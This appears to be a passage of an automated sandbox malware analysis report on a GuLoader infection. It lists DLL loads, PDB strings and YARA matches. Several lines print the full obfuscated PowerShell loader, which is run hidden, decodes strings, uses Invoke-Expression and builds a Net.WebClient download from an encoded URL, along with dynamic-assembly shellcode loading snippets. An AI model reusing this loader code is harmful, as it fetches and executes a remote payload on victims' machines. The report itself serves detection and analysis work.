Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdb source: pwahelper.exe.8.dr
Source: Binary string: GoogleUpdate_unsigned.pdb source: GoogleUpdate.exe.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.8.dr
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb source: msoev.exe.8.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb source: LICLUA.EXE.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.8.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.8.dr
Source: Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.8.dr
Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb source: DW20.EXE.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdbOGP source: ie_to_edge_stub.exe.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdb source: PerfBoost.exe.8.dr
Source: Binary string: wab.pdbGCTL source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: msoev.exe.8.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.1992900389.0000000007945000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.8.dr
Source: Binary string: wab.pdb source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SCANPST.EXE.8.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: LICLUA.EXE.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdbOGP source: pwahelper.exe.8.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb774 source: javacpl.exe.8.dr
Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.8.dr
Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: DW20.EXE.8.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.8.dr, java.exe0.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdbb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: PerfBoost.exe.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdb source: ie_to_edge_stub.exe.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb source: SETLANG.EXE.8.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@g source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb source: SCANPST.EXE.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SETLANG.EXE.8.dr

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000005.00000002.2002398118.000000000ACBC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2001822967.0000000008D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1989436125.000000000625A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Bilfragter)$global:Tilsikring = [System.Text.Encoding]::ASCII.GetString($Svedekurene)$global:Owertaen=$Tilsikring.substring($Erstatningsfri,$Capanne)<#Sandpaper Kontrollinie Skjoldbr
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Pegefingeren $Revets $Systemrelation), (Stimuleret @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Svingtud = [AppDomain]::CurrentDomain.GetAssemblies()$gl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Gaslighting)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Heliophobic, $false).DefineType($unadopted, $
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Bilfragter)$global:Tilsikring = [System.Text.Encoding]::ASCII.GetString($Svedekurene)$global:Owertaen=$Tilsikring.substring($Erstatningsfri,$Capanne)<#Sandpaper Kontrollinie Skjoldbr
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHy
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOr
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHy Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ 